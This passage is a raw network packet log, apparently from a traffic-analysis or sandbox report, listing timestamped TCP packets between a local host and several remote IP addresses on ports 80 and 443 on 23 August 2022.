Aug 23, 2022 03:42:49.186173916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.186182976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.186213970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.208441019 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:49.208492041 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:49.216808081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.216842890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.216862917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.216883898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.216881990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.216906071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.216916084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.216921091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.216926098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.216948032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.216952085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.216969967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.216996908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217009068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217016935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217061043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217082024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217109919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217128992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217129946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217150927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217180014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217217922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217243910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217267036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217267990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217283010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217291117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217312098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217327118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217334032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217341900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217350960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217366934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217413902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217437029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217462063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217492104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217513084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217514038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217536926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217545033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217607975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217628956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217684984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217737913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217761040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217781067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217783928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217802048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217808962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217823029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217827082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217847109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217852116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.217863083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217891932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.217978954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218002081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218015909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218043089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218060017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218079090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218130112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218153000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218173981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218178034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218202114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218211889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218244076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218271971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218286991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218292952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218313932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218336105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218369961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218396902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218414068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218419075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218436956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218442917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218456030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218486071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218488932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218508959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218523026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218556881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218626976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218647957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218684912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218714952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218827963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218851089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218878984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218880892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218894005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.218899965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218916893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.218967915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219032049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219053030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219083071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219098091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219149113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219171047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219192028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219197989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219208956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219290972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219293118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219316959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219383001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219409943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219430923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219482899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219517946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219521999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219667912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219691992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219736099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219738007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219786882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219793081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219819069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219841957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219871044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219878912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219892979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219914913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219952106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.219953060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.219986916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220002890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220037937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220060110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220105886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220134974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220164061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220223904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220312119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220334053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220371008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220391989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220431089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220453024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220465899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220499992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220505953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220544100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220544100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220567942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220591068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220632076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220659971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220665932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220690966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220711946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220731974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220777988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220792055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220797062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220819950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220849037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220870972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220886946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220899105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.220932007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220952988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.220990896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221004963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221065044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221086979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221108913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221122980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221155882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221174002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221198082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221220970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221245050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221297026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221312046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221316099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221334934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221388102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221612930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221645117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221687078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221698999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221700907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221724033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221745968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221760988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221767902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221771002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.221785069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221801043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221815109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221829891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221844912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221860886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.221952915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222531080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222611904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222647905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222692013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222707033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222727060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222754955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222768068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222789049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222795963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222810030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222819090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222831011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222835064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222852945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222861052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222882986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222899914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222903967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222924948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222945929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222948074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222963095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222966909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.222981930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.222987890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223006964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223025084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223026037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223046064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223061085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223082066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223157883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223193884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223201036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223216057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223232031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223237038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223258018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223262072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223272085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223278999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223294973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223299980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223318100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223320961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223332882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223344088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223367929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223400116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223426104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223445892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223467112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223472118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223484993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223490953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223510027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223511934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223530054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223548889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223555088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223592997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223598957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223620892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223640919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223643064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223659039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223683119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223691940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223714113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223736048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223736048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223756075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223763943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223778009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223778009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223800898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223817110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.223826885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.223866940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.242768049 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.242806911 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.242882967 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.243339062 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.243354082 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.322139025 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.323147058 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.323168993 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.324448109 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.325009108 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.325304031 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.403893948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.404357910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.407037020 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.428738117 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.438312054 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438338995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438358068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438371897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438390970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438411951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438431025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438451052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438457966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438472033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438491106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438523054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438528061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438543081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438599110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438627005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438653946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438656092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438663960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438683987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438688993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438707113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438714981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438726902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438747883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438774109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438775063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438787937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438791990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438795090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.438805103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.438817978 CEST	49774	80	192.168.2.3	45.95.11.158
